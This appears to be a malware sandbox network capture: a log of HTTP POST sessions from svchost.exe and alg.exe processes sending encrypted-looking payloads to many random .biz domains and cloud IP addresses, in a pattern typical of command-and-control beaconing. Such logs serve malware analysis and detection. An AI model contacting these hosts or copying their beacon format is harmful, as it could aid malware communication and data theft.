Oct 8, 2024 15:28:57.109078884 CEST | 778 | OUT | Data Raw: 58 5e c9 00 26 c3 74 b6 fe 02 00 00 0f eb 2c 05 6c 4a 4d de 7f 87 ed 65 8e 86 b3 5b 71 ce 63 e2 04 af 4e c5 57 69 5a 00 85 ca 08 45 79 82 db ef c2 ee 04 ef 67 cc 18 d4 90 e7 71 11 86 02 9b 29 3f a9 31 ef 6e 14 15 21 00 ee e7 7a f8 cd d6 b4 71 78
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: X^&t,lJMe[qcNWiZEygq)?1n!zqxk+LR8r";sZc2Jcb4p-b}|z9 H$0MTZTdkQch)L,GH,#_J
Oct 8, 2024 15:28:57.817976952 CEST | 170 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Oct 8, 2024 15:28:57.879245043 CEST | 352 | OUT | POST /lihflvfpneg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:57.879275084 CEST | 778 | OUT | Data Raw: 1a a1 f4 f3 ff ef 55 31 fe 02 00 00 f6 f1 6f fe 8b 90 80 8e 40 60 46 40 99 20 90 57 3a 86 cb 58 c2 6d f3 64 fe d2 dc b1 dc a3 9a bb 41 f0 d1 08 ed 44 21 ba 27 1c a4 bf 71 c0 61 21 d0 77 2d f9 23 18 97 a7 e4 34 d3 ff c1 63 c5 8d 0f 22 da 2b 72 f7
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: U1o@`F@ W:XmdAD!'qa!w-#4c"+ruOM0z#''9EB']Y"):$ew1HG-9T)INTV}Kq3Q~FA}&D4-q{fur:YV@x9nsU%."=t!X
Oct 8, 2024 15:28:58.107155085 CEST | 170 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49943 | 18.208.156.248 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:57.866677046 CEST | 347 | OUT | POST /ryysvg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:57.866677046 CEST | 786 | OUT | Data Raw: eb 6a 78 1e 6d b1 80 b1 06 03 00 00 54 e1 e6 e5 2d 14 3d 89 6c 76 f7 64 77 e0 f8 0f c6 8c 9e dd d5 3c 38 36 bf a3 56 3a e7 a9 39 19 a1 ab 25 51 d7 9a fb ed fe 09 66 d4 f2 d0 43 9f d0 ec 91 f4 7d c1 2f 4c c8 d6 7d b8 6f 56 c6 f6 42 34 f4 e6 b9 df
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: jxmT-=lvdw<86V:9%QfC}/L}oVB4\L4pLe&:jyL.8e]LXDj}@Pw)mIIV0J5Kl?[KwXX?2S?UL`Iz${kc l^4dS$z:l
Oct 8, 2024 15:28:58.321844101 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=8bba6b8341cd27318ad3446838954608|8.46.123.33|1728394138|1728394138|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 49945 | 54.244.188.177 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:58.253988981 CEST | 357 | OUT | POST /ihixrfcnmctn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:58.254019022 CEST | 778 | OUT | Data Raw: 76 30 1f b0 d2 19 b0 54 fe 02 00 00 b1 45 f9 3c 09 7b 06 35 dc e1 eb 55 98 d6 54 fe 2e 43 16 ca 1c 36 e5 53 25 51 ce e9 39 d7 55 da 73 ac 87 c6 35 4e 92 0b 46 4d 08 78 0b cc 4e ea 0f 5a 26 14 56 ad 3a b1 1a 75 21 23 4d 72 9d 3a 5d fe 8d 69 cb 85
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: v0TE<{5UT.C6S%Q9Us5NFMxNZ&V:u!#Mr:]iK$8qM*8G~%.l>X,h<W^L>ap@Rnw54'k0<f+<_!}Nsm:h-3} uFjWC
Oct 8, 2024 15:28:58.973433018 CEST | 411 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=02b074bea0a401d6fff2cffee3baf96c|8.46.123.33|1728394138|1728394138|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID: 62 | Source IP: 192.168.2.4 | Source Port: 49947 | Destination IP: 44.221.84.105 | Destination Port: 80 | PID: 4476 | Process: C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:58.399272919 CEST | 360 | OUT | POST /bsskdfvqijpyfnid HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:58.399286985 CEST | 786 | OUT | Data Raw: 04 ee 1e b1 bf b2 36 82 06 03 00 00 50 68 27 ea f6 6c ea 48 5e ab 7e 34 67 38 4c 9a 70 ee 0d 8d 83 85 b3 74 9e e8 b5 fa 88 e0 f0 31 60 fb 43 77 33 cc a7 0d 55 33 19 78 56 71 c9 3a 40 70 2a 1b aa 8e c5 3f 70 37 8d b1 07 25 8d b8 eb be 2f a5 9f 18
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6Ph'lH^~4g8Lpt1`Cw3U3xVq:@p*?p7%/]{ZRNb ss*T/Ln7@< g^P(O?\Jad&r4)8^vkO5.*4h[Y~/#Z1cQOZFmxnS
Oct 8, 2024 15:28:58.877732038 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ff2e52c734806c009a481621c5178ea0|8.46.123.33|1728394138|1728394138|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID: 63 | Source IP: 192.168.2.4 | Source Port: 49952 | Destination IP: 18.141.10.107 | Destination Port: 80 | PID: 4476 | Process: C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:58.965022087 CEST | 354 | OUT | POST /dxsssktqcq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:58.965061903 CEST | 786 | OUT | Data Raw: 9b 88 a2 e4 e3 47 e7 d2 06 03 00 00 7e 8f e3 9d 9b 36 de 7d ac 81 ad 4a 28 fe c4 56 7e f1 bf b8 45 0a c4 cb b4 21 63 76 15 32 8e 37 83 d7 3a 88 81 91 da 70 5e 24 c7 c4 96 1f 89 aa e4 d4 5d 4a df 45 fb dc b1 c2 28 0f c9 40 ea 42 a5 03 32 d7 32 f2
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: G~6}J(V~E!cv27:p^$]JE(@B22kAUuZPaX(9))?_gMofD7LP^dV\g!7q3W~\>.H q.DN{wc.31m_)R-Zx)
Oct 8, 2024 15:29:00.307182074 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=4a0b43c6b2db1690d772a1fe3102a31f|8.46.123.33|1728394140|1728394140|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID: 64 | Source IP: 192.168.2.4 | Source Port: 49954 | Destination IP: 208.100.26.245 | Destination Port: 80 | PID: 2912 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:59.080276012 CEST | 356 | OUT | POST /gdfpfuufvopwu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.080290079 CEST778OUTData Raw: 0a 8d 55 77 50 f4 ae fe fe 02 00 00 47 5c f5 37 24 e7 a1 47 11 c1 8d 4a ff f5 de 15 c1 e8 b0 09 1f 7e 1c 9a 12 25 c5 c1 8c a4 af 0f a1 5e cd e3 3f 7f da bb a0 7b 58 0f 15 4c 56 2d 76 02 69 0c 0f 38 63 5b aa 68 f5 0c 61 3d de 2b 6c c0 8c a7 7b f9
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: UwPG\7$GJ~%^?{XLV-vi8c[ha=+l{/`cj/y<UE7'uJ-n'%5\0f+o((:I/S]RWO`:, FAj*&OqM%I#|F8#F{UA5
Oct 8, 2024 15:28:59.585763931 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 8, 2024 15:28:59.645131111 CEST | 344 | OUT | POST /v HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.645941973 CEST778OUTData Raw: 80 11 22 d5 77 15 9c 0f fe 02 00 00 9d 2c 70 ed de 34 7a 7f ec ce 51 76 bc 4d b9 f6 47 78 48 1e 24 b6 a9 92 7f cd 84 a8 14 39 84 f5 be ab bd 5c 28 e8 92 96 07 69 cf df 46 dc 26 b6 b3 62 f6 f3 11 fe 9d a7 e7 c3 a7 6b 90 13 a7 ca ae 91 3f 0a 24 75
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "w,p4zQvMGxH$9\(iF&bk?$ux[Y:D/FoWi-".<M9+pfAPtC~E|}'mnP]+M)T@]:&K+*pGRqj6w!'r-]]sXyUm
Oct 8, 2024 15:28:59.824840069 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 49963 | 34.211.97.45 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:00.083837032 CEST | 351 | OUT | POST /qgorjabxoa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.083837032 CEST778OUTData Raw: a7 c0 c7 67 59 41 c3 40 fe 02 00 00 76 d9 05 81 65 9a d1 46 c5 8b cb b2 c0 ca fe 5c 49 2b 95 20 88 ee a4 c1 dc ef e5 c9 4d 96 a5 06 e9 ac 03 48 08 cb e3 f7 47 98 53 c5 f5 c2 72 a5 fc 76 80 9d f9 13 52 9d 56 e8 5b 9c 89 b2 af 05 e5 4a db 73 a6 ce
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: gYA@veF\I+ MHGSrvRV[Jsiw-zY(OVtQ!Y(uUP\58p^5-tI+/k;p/I*.#~J,Tv!JLoO"jK(\fAPPvJy3Bf9b!
Oct 8, 2024 15:29:00.820430040 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=f24aa81d462a605e1c94f38aafa2ab27|8.46.123.33|1728394140|1728394140|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.4 | 49966 | 44.213.104.86 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:00.467190981 CEST | 342 | OUT | POST /v HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.467216015 CEST786OUTData Raw: 90 06 03 62 f0 36 c1 75 06 03 00 00 a3 a0 19 56 f5 8f a2 f8 8d 1f 65 da b0 f7 4c 27 f1 72 e1 83 75 d8 2d 96 67 a4 ca 28 a6 f5 5d 63 2e 02 1e a8 91 be 5b 6f 11 be 5b 54 2c 67 72 00 48 d2 30 71 bb 45 b7 79 ec a9 66 ac 64 39 80 b4 0d 47 36 eb 83 75
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: b6uVeL'ru-g(]c.[o[T,grH0qEyfd9G6u$94$/4e!,&&bauG0ol/=lqbZvjq9;p-D-[*dY+WtsY/UupOi&06BRk%R"HFm>c
Oct 8, 2024 15:29:00.944323063 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=456620071439b6a58b7b253e37a11edf|8.46.123.33|1728394140|1728394140|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.4 | 49971 | 18.208.156.248 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:01.134105921 CEST | 348 | OUT | POST /weir HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:01.134129047 CEST | 786 | OUT | Data Raw: 7a 56 2c dc e9 5a 6e 6d 06 03 00 00 08 16 3f ee 62 bf 9f 47 a0 fc 41 e7 dc fe db 52 a9 67 24 62 d5 cd c3 b0 a8 4e e4 b1 d5 8b e2 63 9b 4f f8 9b 55 5d a2 a6 eb 8c 54 56 de d8 3f f5 0d 73 13 4d d9 57 da 2f 87 64 bd 60 65 7a 1c a8 3d b7 bc cd 04 49
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: zV,Znm?bGARg$bNcOU]TV?sMW/d`ez=IX2_28@(SJK_K<d+3aE@{^OBfmHp+9;O^iT%a5&>tpg$g\d7v!=Fw}E
Oct 8, 2024 15:29:01.598387003 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=956451c7933885173716a254994b0d1d|8.46.123.33|1728394141|1728394141|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 49973 | 54.244.188.177 | 80 | 2912 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:01.191152096 CEST | 346 | OUT | POST /xg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lrxdmhrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:29:01.191293955 CEST | 778 | OUT | Data Raw: b3 06 0d 62 d0 32 3a 08 fe 02 00 00 2c 8a 72 74 38 7f b7 85 7a 62 34 dd 5c 8b da ab 54 ea 55 0f bb 88 f3 ab b2 63 b9 e5 8f 11 11 26 e4 8f 54 41 86 4b 8e c1 f4 c8 1c d4 bb 64 99 7c 54 16 f9 de 13 c4 71 fc 0a 9e 82 5f 75 4e 99 27 49 e4 06 43 cd 7a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: b2:,rt8zb4\TUc&TAKd|Tq_uN'ICzl~|_#F<tc5`z$T%RD8sMqjd"Gm;~x`/GtRdo~Y&dLN-EtIn$J=G?M>z~k
Oct 8, 2024 15:29:01.945708990 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=24a4bc582dd585a017921bee411f83e5|8.46.123.33|1728394141|1728394141|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
